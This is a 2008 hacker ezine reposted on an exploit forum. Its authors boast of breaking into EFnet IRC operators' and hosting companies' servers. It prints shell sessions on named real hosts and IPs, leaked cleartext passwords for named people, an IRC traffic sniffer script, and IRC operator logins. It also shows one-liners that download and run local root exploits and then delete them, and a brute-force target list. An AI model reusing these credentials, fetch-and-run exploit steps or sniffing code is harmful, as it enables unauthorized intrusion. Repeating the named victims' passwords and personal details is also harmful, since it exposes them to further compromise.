Exploit x0x0x #2

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42905
Проверка EDB
  1. Пройдено
Автор
X0X0X
Тип уязвимости
PAPERS
Платформа
EZINE
CVE
N/A
Дата публикации
2008-03-01
x0x0x #2
Код:
#!/local/efnet/el8/efnet/corporation
################################################
### x0x0x  x0x0x  x0x0x  x0x0x  x0x0x  x0x0x ###
### x0x0x  x0x0x  x0x0x  x0x0x  x0x0x  x0x0x ###
### x0x0x  x0x0x  x0x0x  x0x0x  x0x0x  x0x0x ###
################################################
#                                              #
#                                              #
#            ÛÛÛÛ             ÛÛÛÛ             #
#           ÛÛ± ÛÛ           ÛÛ± ÛÛ²           #
#  ÛÛÛ  ÛÛ ±ÛÛ  ±Û° °ÛÛ  ÛÛ  ÛÛ  ±ÛÛ °ÛÛ  ÛÛ°  #
#   ÛÛ²ÛÛ  ²ÛÛ  °Û²  °Û²ÛÛ   ÛÛ  °ÛÛ  °Û²ÛÛ°   #
#    ÛÛÛ   ²ÛÛ  °Û±   ÛÛÛ    ÛÛ  °ÛÛ   ÛÛÛ     #
#   °ÛÛÛ±  ±ÛÛ  ±Û°   ÛÛÛ±   ÛÛ  ±ÛÛ   ÛÛÛ±    #
#   ÛÛ°ÛÛ   ÛÛ± ÛÛ   ²Û°ÛÛ   ÛÛ± ÛÛÛ  ²Û°ÛÛ²   #
#  ÛÛ²  ÛÛ   ÛÛÛÛ   ²Û²  ÛÛ   ÛÛÛÛ   ²Û²  ÛÛ²  #
#                                              #
################################################
#                                              #
#              .: second zine :.               #
#                                              #
#        [  tribute to efnet el8 corp  ]       #
#                                              #
#                                              #
#   date:    december 2007                     #
#   update:  march 2008                        #
#                                              #
#                                              #
#<><><><><><><><><><><><><><><><><><><><><><><>#
#                                              #
#   -= always keeping the secret identify =-   #
#                                              #
#<><><><><><><><><><><><><><><><><><><><><><><>#

  .''.
 (~~~~)
   ||
 __||__
/______\
  |  |' _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
  |  |'|o| - - - - - - - - - - - - - - - - - - - - - - - - -||
  |  |'| |                                                  ||
  |  |'| |                      . ' .                       ||
  |  |'| |                  . '       ' .                   ||
  |  |'| |              . '    .-'"'-.    ' .               ||
  |  |'| |          . '      ,"       ".      ' .           ||
  |r |'| |      . '        /:   x0x0x   :\        ' .       ||
  |s |'| |  . '            ;  . x0x0x    ;            ' .   ||
  |t |'| |    ' .          \: ..x0x0x   :/          . '     ||
  |  |'| |        ' .        `. . .    ,/       . '         ||
  |  |'| |            ' .      `-.,,.-'     . '             ||
  |  |'| |                ' .           . '                 ||
  |  |'| |                    ' .   . '                     ||
  |  |'| |                        '                         ||
  |  |'|o|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_||
  |  |'
  |  |'
  |  |'  united by brazil  - 100% BRAZUKAAAAAAAAAAAA
  |  |'
  '~~'



\\                                                                                 //
  A long time ago, most part of 'leet' user of efnet network didnt like brazilians,  
  saying they are 'packet kiddies', 'lammers'. these 'leet' users start to believe 
  about it, but they think all  .br guys was that! So we have the idea of laugh of 
  these  'leet boys'  and start  to publish to everbody see what really happens on 
  efnet! hehehe
  Some passwords we´ll not publish, only to avoid surprises in our access!
  They are smart! but! we´re looking at them!
//                                                                                 \\



*/

  TARGETS : SHELL ACCOUNTS && EFNUT HUXORS && IRCOPS && EFNET SERVERS

 /*




STEVOO w45 h4ck3d... oMG iRcop Admin HackEd ??? Yeah.. She/HE Is!!

Stevoo / Stefan !! PoOoooooooooooooWWwwww !!! Results: http://img149.imageshack.us/img149/356/stevootn3.jpg


login as: root
[email protected]'s password:
Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

[root@quagga ~]# uname -a;ifconfig;cat /etc/passwd|grep bash

Linux quagga.webguidepartner.com 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux



#0h 5ur3 n0w w3 4r3 47 stevoo m41n 53rv3r!! okk stevooooooooo =****!!! n0w w3 wi11 5n1ff u!



[root@quagga ~]# cat /etc/passwd|grep bash
root:x:0:0:root:/root:/bin/bash
zabbix:x:1001:1001:,,,:/home/zabbix:/bin/bash
stevoo:x:1002:1002:Stefan Larsson,,,:/home/stevoo:/bin/bash
lunkan:x:1000:1000:,,,:/home/lunkan:/bin/bash
ftp:x:112:65534::/home/ftp:/bin/bash
moffe:x:1003:1003:,,,:/home/moffe:/bin/bash
j-dog:x:1004:1004:,,,:/home/j-dog:/bin/bash
mac:x:1005:1005:,,,:/home/mac:/bin/bash
irc:x:1006:1006:,,,:/home/irc:/bin/bash
ustas:x:1007:1007:,,,:/home/ustas:/bin/bash
dubkat:x:1008:1008:,,,:/home/dubkat:/bin/bash
sonny:x:1009:1009:,,,:/home/sonny:/bin/bash
flyguy:x:1010:1010:,,,:/home/flyguy:/bin/bash



^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^~~~~~~~~~~~~~~~~FINDING NEMOOOOOOOOOOO~~~~~~~~~~~~~~^
^^^^^^^^^^^^^^^^^^^^   ^^^^^   ^^^   ^^^^^^^^^^  ^^^^^

                                     _
                                    (_)
              |    .
          .   |L  /|   .          _
      _ . |\ _| \--+._/| .       (_)
     / ||\| Y J  )   / |/| ./
    J  |)'( |        ` F`.'/        _
  -<|  F         __     .-<        (_)
    | /       .-'. `.  /-. L___       
    J \      <    \  | | O\|.-'  _   
  _J \  .-    \/ O | | \  |F    (_) 
 '-F  -<_.     \   .-'  `-' L__    
__J  _   _.     >-'  )._.   |-'  
`-|.'   /_.           \_|   F    
  /.-   .                _.<     
 /'    /.'             .'  `\    
  /L  /'   |/      _.-'-\
 /'J       ___.---'\|
   |\  .--' V  | `. `
   |/`. `-.     `._)
      / .-.\
VK    \ (  `\
       `.\


[root@quagga ~]# cd /l4m3d1r/; cat p455w0rdz.txt


WIKI
----------------
user = putumayo
pass = utE09X2

FINALTEST
-----------------
user = finaltest
pass = FINAL06tst

POKERLISTINGS.COM
--------------------------------
user = turbonegro
pass = eFb9KLm

POKER USER
--------------------
user = poker
pass = kLmn09Q3

ROOT
----
user = root
pass = 5aB197cQ
NEW = UZk9Taj23
-----------------




THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX
>>>>>>>>>>> AS YOU CAN SEE STEVOO IS A GOOD ADMIN! SAVING PASSWORDZ IN YOUR HOME FILEZZZZZZ <<<<<<<<<<<<
THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX




#dubkat 4nd sonny!!! g00d 74rg3755!!!!!!


#0kkk!! ch3ck1ng 1p5!!!!!!!!!!



[root@quagga ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:13:72:7B:7B:C9
          inet addr:83.140.180.6   Bcast:83.140.180.255  Mask:255.255.255.0
          inet6 addr: fe80::213:72ff:fe7b:7bc9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:383711035 errors:0 dropped:0 overruns:0 frame:0
          TX packets:476418783 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3959576563 (3.6 GiB)  TX bytes:1066088994 (1016.7 MiB)
          Interrupt:169

eth0:0    Link encap:Ethernet  HWaddr 00:13:72:7B:7B:C9
          inet addr:83.140.180.2  Bcast:83.140.180.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:169

eth0:1    Link encap:Ethernet  HWaddr 00:13:72:7B:7B:C9
          inet addr:83.140.180.151  Bcast:83.140.180.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1



................................
................................
......................
....................     hmmmmmmmmmmmmm 7h3 1p 15 u53d t0 c0nn3c7 70 efnet.port80.se!! l375 ch3ck ?!?
....................



## Just ip(83.140.180.2 ) can access port80.se, okay honey!! do that!


[root@quagga ~]# ssh -l root -b 83.140.180.2 efnet.port80.se
[email protected]'s password:
Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

[root@efnet ~]# uname -a

FreeBSD efnet.port80.se 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Sat Nov  3 01:23:30 CET 2007     [email protected]:/usr/obj/usr/src/sys/EFNET  i386 



#0hhhhhhhh g0dddddddddddddd!!! port80.se 0wn333333ddddddddddddd!!!! l000000000lllllllll!!!!! l375 ch3ck m4ch1n3



   ***********************************************
  //////////    ///////////\\\\\\\\\\    \\\\\\\\\\
 //////////    !!!ILEGAL TOOL FOUND!!!    \\\\\\\\\\
//////////    ////////////  \\\\\\\\\\\    \\\\\\\\\\
+++++++++++++++++++++++++++++++++++++++++++++++++++++


[root@efnet xxxxx]# cat ircsniff.pl

#!/usr/bin/perl

if(@ARGV == 0) {
  print "Args: $ARGV[0] [port]\n";
  exit(0);
}

if(@ARGV == 1) {
  $port = $ARGV[0];
  open(FH, "tshark -tad -lnx -d tcp.port==$port,irc -R 'irc' |") or die "Unable to open wireshark.";
}
my $packet = "";

while(<FH>) {
  chomp($_);
  chomp($_);

  if($packet && /^$/) {
    for(split /\r\n/, $packet) {
      if(/(:[^ ]+ PRIVMSG .*)$/i) {
        print "<- $1\n";
      } elsif(/(PRIVMSG .*)$/i) {
        print "-> $1\n";
      }
    }
    $packet = "";
  }

  if(/^[\da-f]{4}  (([\da-f]{2} ?)+)   /) {
    my $a = $1;
    $a =~ s/([\da-f]{2})\s?/chr(hex($1))/eg;
    $packet .= $a;
  }
}
close(FH);





%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%
%%%%
%%         later thay say that ircops dont sniffz this server on efnet! there this the test!
%

%


%




Lets Joke:

[root@quagga ~]# wget www.site.com/bnc.perl;perl bnc.perl 8000 st3v0

on irc: 

/server 83.140.180.6:8000

* Connecting to 83.140.180.6 (8000)
-216.47.178.108- *** [BNC 1.8-teste9 por 0ldW0lf - Atrix Team]
-216.47.178.108- *** Digite /QUOTE PASS <senha>
-216.47.178.108- *** Senha aceita. Bem vindo, administrador!
-216.47.178.108- *** Digite /QUOTE CONN <servidor[:porta]> [opções]
-216.47.178.108- *** Para lista os comandos da BNC digite /QUOTE BHELP
-BNC- [Admin LOG]: Usuário administrador logou

/quote conn efnet.port80.se:6667
/server efnet.port80.se
/nick stevoo_gay

#get oper
/oper ***** *****


#COOL [email protected] gets spoofed host!! 


/msg #x0x0x h3110 w0r1d!


x0x0x_0wn is [email protected] * Stefan Larsson [STLA-RIPE]
x0x0x_0wn using efnet.port80.se We eat more pussy!
x0x0x_0wn is a beaver gourmet (Server Administrator)
x0x0x_0wn has been idle 5secs, signed on Mon Nov 05 16:36:48
x0x0x_0wn End of /WHOIS list.




ll0000000000llllllllllllllllllllll!! stevoo u are the magic!!!!




&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&

7w0 y34r5 5n1ff1ng ur h0m3 b0x stevoo , 7h3n w3 g37 s0m3 4cc355 , my fr13nd
1337´5 533 7h3n ?
x0x0x h4v3 100% 4cc355 1n ur 0wn n37w0rk, 4nd 07h3r5



    ,` `/` `. ,\  
  /` ` ' /, ' ,` \   
   ` / ` ` ' ,.,`,   
 /-/- ``/=   = \ ,`  
  ''  '  @'  @' ) \  
 //|'/ )   |\  |\`    
 cf   (   ,,',, )   
       \__ -- _/    
          `--'       "STEVOO is synonymous of SUPERMAN!" Albert Einstein




       **************************  tevoo
    .*##*:*####***:::**###*:######*.  tevoo
   *##: .###*            *######:,##*  tevoo
 *##:  :####:             *####*.  :##:  tevoo
  *##,:########**********:,       :##:  tevoo
   .#########################*,  *#*  tevoo
     *#########################*##:  tevoo
       *##,        ..,,::**#####:  tevoo
        ,##*,*****,        *##*  tevoo
          *#########*########:  tevoo
            *##*:*******###*  tevoo
             .##*.    ,##*  tevoo
               :##*  *##,  tevoo
                 *####:  tevoo
                   :,  tevoo


&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&
&&&&
&&
&


#Spain Host


[root@x0x0x ~]# ssh 91.142.209.1
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux es.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit



#Australian Host


[root@x0x0x ~]# ssh 202.125.41.133 -l sonny.sarai
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux au.int.webguidepartner.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 athlon i386 GNU/Linux
bash# exit


#Flexservers is a box very important with importants files that i WONT publish !! lol :


[root@x0x0x ~]# ssh 213.239.174.129 
[email protected] 's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux flexserver.flexservers.com 2.6.22.9 #2 SMP Fri Oct 5 17:52:23 CEST 2007 i686 i686 i386 GNU/Linux
bash# exit


#German Host


[root@x0x0x ~]# ssh 80.86.82.231 -l sonny.sarai
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux de 2.6.16.1-amd-webperoni-06042006-1 #1 Thu Apr 6 17:01:51 CEST 2006 i686 athlon i386 GNU/Linux
bash# exit




#Idiot box good bandwith ## used to host my worm some days lol



[root@x0x0x ~]# ssh 205.234.178.244
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux lb1 2.6.15-2-amd64 #1 SMP Tue Aug 28 17:53:01 BST 2007 x86_64 GNU/Linux
bash# exit



#Suomi Host



[root@x0x0x ~]# ssh 217.30.189.33 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux fi.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit




#Netherlands Host



[root@x0x0x ~]# ssh 81.171.121.170 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl)
bash# exit




#Netherlands Host



[root@x0x0x ~]# ssh 217.30.189.33 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl)
bash# exit




#Canada Host



[root@x0x0x ~]# ssh 204.15.197.130 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux gw.ca.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686 i686 i386 GNU/Linux
bash# /lib/ldd 2242

83.140.43.249 (per:5!vcAP8!)
83.140.43.49 (stefan:n1nj4h1978) *old pass of stevoo i wont said new pass!*

bash# exit




#Malasya Host



[root@x0x0x ~]# ssh 124.217.250.115 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux my.int.webguidepartner.com 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 i686 i386 GNU/Linux
bash# exit




#Spain Host



[root@x0x0x ~]# ssh 75.126.49.137 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux es.int.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux
bash# exit




#Usa gayl0rd Host



[root@x0x0x ~]# ssh 69.20.4.41
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux us.int.webguidepartner.com 2.6.9-42.0.2.EL #1 Thu Aug 17 17:36:53 EDT 2006 i686 athlon i386 GNU/Linux
bash# exit




#Malasya Host


of some boxes i will show some login:password to show that´s not fake! : (per:5!vcAP8!) (sonny.sarai:comp1409sonny) (stefan:n1nj4h1978) (root:JAk9Taj23) (h00h0h0)


[root@x0x0x ~]# ssh 74.53.191.130 
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux webhostingsearch.com.theplanet.host 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 i686 i386 GNU/Linux (82.bf.354a.static.theplanet.com)
bash# exit


//idiots using same root password and personal logins in all boxes!! that´s love!

#Dev dataBase Host




[root@x0x0x ~]# ssh 83.140.180.235 -l anna
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux devbase 2.6.18-53.1.4.el5PAE #1 SMP Fri Nov 30 01:21:20 EST 2007 i686 i686 i386 GNU/Linux

bash# ssh [email protected]
[email protected]'s password: Eb11Be22
[[email protected] ~]$ exit;

bash# exit



*&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&(
#$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&(

#HAHHAHAHA "FULL HACK"0rz owned!! good hax0rs!!

#$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&(
*&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&(





[root@x0x0x ~]# ssh 83.140.33.134 -l stevoo
[email protected] 's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux spark.bgpmonkey.net 2.6.20-1.2320.fc5 #1 Tue Jun 12 18:50:38 EDT 2007 i686 i686 i386 GNU/Linux

bash# ssh [email protected] (acad23:Eb11Be22)

[[email protected] ~]$ exit;

bash# exit




****************************
############################
**#
**#  want get ircop? 
*#
#  try on fulhack irc: /oper stevoo bajs
#







#Other shit



[root@x0x0x ~]# ssh 83.140.2.18 -l per
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux
bash# exit







#Other shit 2!! 



[root@x0x0x ~]# ssh 82.103.140.20 -l Customer
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux e82-103-140-20s.easyspeedy.dk 2.6.18-53.el5PAE #1 SMP Mon Nov 12 02:55:09 EST 2007 i686 athlon i386 GNU/Linux
bash# exit





#Other shit 3!! 



[root@x0x0x ~]# ssh 82.140.8.18
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux mx.rockintention.com 2.6.18-8.1.8.el5 #1 SMP Tue Jul 10 06:50:22 EDT 2007 i686 i686 i386 GNU/Linux
bash# exit





#Other shit 4!! 



[root@x0x0x ~]# ssh 83.140.180.63  (rootpass = mortgage4711)
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux harry.webguidepartner.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 athlon i386 GNU/Linux
bash# exit






#Other shit 5!! 



[root@x0x0x ~]# ssh 82.96.22.90
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux se.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux
bash# exit






#Other shit 6!! 



[root@x0x0x ~]# ssh 82.103.140.117
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux rake 2.6.18-8.1.10.el5 #1 SMP Thu Sep 13 12:17:54 EDT 2007 i686 athlon i386 GNU/Linux
bash# exit






#Other shit 7!! 



[root@x0x0x ~]# ssh 83.140.180.3
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux failover.webguidepartner.com 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 8!! 



[root@x0x0x ~]# ssh 83.140.43.100
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 9!! 



[root@x0x0x ~]# ssh 83.140.43.100
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 10!! 



[root@x0x0x ~]# ssh 83.140.43.71
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux skalman 2.6.18-8.el5xen #1 SMP Fri Jan 26 14:42:21 EST 2007 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 10!! 



[root@x0x0x ~]# ssh 83.140.43.26
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 11!! 



[root@x0x0x ~]# ssh 67.192.39.119
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux 133972-dev.mortgageloan.com 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 athlon i386 GNU/Linux
bash# exit



OK! Fuck uname´s !! lets go to something more interesting!



[root@x0x0x ~]# ssh 216.240.158.191 -l lcars
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ wget xpl_local_root_leet.bin; chmod a+x xpl_local_root_leet.bin; ./xpl_local_root_leet.bin

bash# rm -rf xpl_local_root_leet.bin;

bash# uname -a
Linux kingdom.scns.com 2.6.23.14-64.fc7 #1 SMP Sun Jan 20 23:54:08 EST 2008 i686 i686 i386 GNU/Linux
bash# exit







.............................................

             ,-. 
    ,     ,-. s ,-. 
   / \   ( r )-( t ) 
   \ |  ,.>-(   )-< 
    \|,' (   )-(   ) 
     Y ___`-'   `-' 
     |/__/   `-' 
     | 
     | 
     |    -dubkat my flower-
  ___|_____________ 

;................



OkAy my Friend DuBKat ... i know that u are good person... but i need show u something! lol



[root@x0x0x ~]# ssh 72.37.235.2 -l dubkat
[email protected]'s password: sjpd3139

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ wget shmat2; chmod a+x shmat2; ./shmat2
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
...........................................p00f!

NIX@# id

uid=0(root) gid=0(root) 

bash# rm -rf shmat2;

bash# uname -a
FreeBSD riley.rsc.cx 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #3: Thu May 24 10:08:07 PDT 2007     [email protected]:/usr/obj/usr/src/sys/RILEY  i386
bash# exit





.............................................
;................QUAKENET HUB



#Thkxxxxxxx g0d




[root@x0x0x ~]# ssh 64.237.63.164 -l sl
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ wget shmat2; chmod a+x shmat2; ./shmat2
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
...........................................p00f!

NIX@# id

uid=0(root) gid=0(root) 

bash# rm -rf shmat2;

bash# uname -a
FreeBSD hub.us.quakenet.org 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Tue May 22 13:08:26 EDT 2007     [email protected]:/usr/obj/usr/src/sys/QUAKENET  i386

bash# netstat -na|grep .6667|wc -l
1544

# lets drop 6667 ? l0lll

bash# exit

Others boxes... that we get on sniff

´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
´´´´´   FreeBSD fw.webguidepartner.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #0: Fri Oct 13 03:04:33 UTC 2006     [email protected]:/usr/obj.pfSense/usr/src/sys/pfSense.6  i386
´´´´´   Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux
´´´´´   Linux lurvas 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux (lurvas.webguidepartner.com)






OLD......


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       )/_            
             _.--..---"-,--c_         
        \L..'           ._O__)_       
,-.     _.+  _  \..--( /           
  `\.-''__.-' \ (     \_              
    `'''       `\__   /\              
                ')                   



                                          MONSTERSHELLSSSSSSS (its gone... :(!)

                                       ~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[root@x0x0x ~]# ssh [email protected]

[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ sudo su -
Password:
bash# id
uid=0(root) gid=0(root) groups=0(root)
bash# uname -a
FreeBSD fire.monstershells.com 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #0: Fri Feb 15 01:47:13 UTC 2008     [email protected]:/usr/obj/usr/src/sys/fire  i386


****** OH THKS IDIOT ********


some logins there


||;;
|| 
|| login in: john:v1p3r007
|| login in: icon:anthony1
|| login in: hack:seven7
|| login in: kuwait:ln7EZB3LBd
|| login in: absolutely:viper007
|| login in: shield:H4ilhitler!
|| login in: john:v1p3r007
||;; 



PHISHER YOU ARE My POPSTAR!!!


ssh [email protected] (98.200.198.242)
[email protected]'s password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ sudo su -
Password:
bash# id
uid=0(root) gid=0(root) groups=0(root)
bash# uname -a
Linux kubuntu 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux
bash# 



&&& THKS FOR GIVE UR BOX TO US USE TO CHECK SOME BRUTEFORCE LIST.. THE SAME THAT WE FOUND ON MONSTERSHELLS LOL &&&


bash# cd /dev/.tty64; cat list


ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
